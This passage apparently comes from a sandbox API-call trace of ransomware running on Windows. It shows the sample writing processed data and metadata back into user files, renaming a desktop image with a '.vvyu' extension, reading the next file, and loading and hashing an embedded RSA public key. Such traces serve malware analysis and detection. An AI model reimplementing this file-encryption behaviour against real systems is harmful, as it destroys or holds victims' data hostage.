(HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0184.173] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0184.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41908 [0184.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8d0 | out: hHeap=0x6a0000) returned 1 [0184.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8e8 | out: hHeap=0x6a0000) returned 1 [0184.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e930 | out: hHeap=0x6a0000) returned 1 [0184.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0184.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e930 [0184.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0184.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e8e8 [0184.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0184.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e8d0 [0184.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0184.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0184.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0184.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0184.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0184.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0184.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0184.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8e8 | out: hHeap=0x6a0000) returned 1 [0184.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8d0 | out: hHeap=0x6a0000) returned 1 [0184.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e930 | out: hHeap=0x6a0000) returned 1 [0184.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0184.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0184.176] GetCurrentThreadId () returned 0x264 [0184.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0184.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d36838 [0184.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0184.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0184.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0184.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0184.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.177] GetCurrentThreadId () returned 0x264 [0184.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0184.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0184.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82c70 [0184.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0184.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e930 [0184.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0184.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0184.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0184.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0184.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0184.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8d0 [0184.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0184.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0184.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0184.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0184.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e8e8 [0184.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0184.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0184.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0184.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8b8 [0184.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0184.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e948 [0184.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0184.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e918 [0184.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e900 [0184.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e960 [0184.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e900 | out: hHeap=0x6a0000) returned 1 [0184.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e900 [0184.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e918 | out: hHeap=0x6a0000) returned 1 [0184.179] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0184.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0184.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0184.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8d0 | out: hHeap=0x6a0000) returned 1 [0184.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e8d0 [0184.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0184.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e930 | out: hHeap=0x6a0000) returned 1 [0184.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0184.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e960 | out: hHeap=0x6a0000) returned 1 [0184.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41908 [0184.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0184.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0184.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8d0 | out: hHeap=0x6a0000) returned 1 [0184.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41b20 [0184.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0184.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0184.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0184.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0184.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0184.182] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0184.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b20 | out: hHeap=0x6a0000) returned 1 [0184.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0184.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e900 | out: hHeap=0x6a0000) returned 1 [0184.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e948 | out: hHeap=0x6a0000) returned 1 [0184.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8e8 | out: hHeap=0x6a0000) returned 1 [0184.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8b8 | out: hHeap=0x6a0000) returned 1 [0184.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0184.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8a0 | out: hHeap=0x6a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d312a0 | out: hHeap=0x6a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0184.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0184.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c70 | out: hHeap=0x6a0000) returned 1 [0184.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0184.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0184.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0184.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0184.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0184.187] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x17700, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x17700, lpOverlapped=0x0) returned 1 [0184.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0184.189] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x17705, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.189] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0184.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0184.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0184.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0184.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0184.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0184.190] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0184.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0184.191] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0184.191] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0184.191] CloseHandle (hObject=0x584) returned 1 [0184.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0184.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d41908 [0184.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0184.194] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\xf-vHBag-ZJttfI79F6Z.bmp" (normalized: "c:\\users\\keecfmwgj\\desktop\\xf-vhbag-zjttfi79f6z.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\xf-vHBag-ZJttfI79F6Z.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\xf-vhbag-zjttfi79f6z.bmp.vvyu")) returned 1 [0184.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.197] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0184.199] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d2563d0, ftCreationTime.dwHighDateTime=0x1d8a3d9, ftLastAccessTime.dwLowDateTime=0xe90895f0, ftLastAccessTime.dwHighDateTime=0x1d8a58f, ftLastWriteTime.dwLowDateTime=0xe90895f0, ftLastWriteTime.dwHighDateTime=0x1d8a58f, nFileSizeHigh=0x0, nFileSizeLow=0x112d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YYyX_.avi", cAlternateFileName="")) returned 1 [0184.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d312a0 [0184.200] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x5e) returned 0x2c6ff30 [0184.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d312a0 | out: hHeap=0x6a0000) returned 1 [0184.200] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YYyX_.avi") returned=".avi" [0184.200] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\YYyX_.avi" (normalized: "c:\\users\\keecfmwgj\\desktop\\yyyx_.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0184.200] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=4397) returned 1 [0184.200] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0184.203] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1107, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.203] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0184.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.205] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.205] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x112d, lpOverlapped=0x0) returned 1 [0184.205] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0184.205] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.205] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.205] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0184.206] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0184.206] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0184.206] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0184.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0184.207] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0184.207] GetLastError () returned 0x0 [0184.207] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0184.207] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0184.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0184.207] UuidCreate (in: 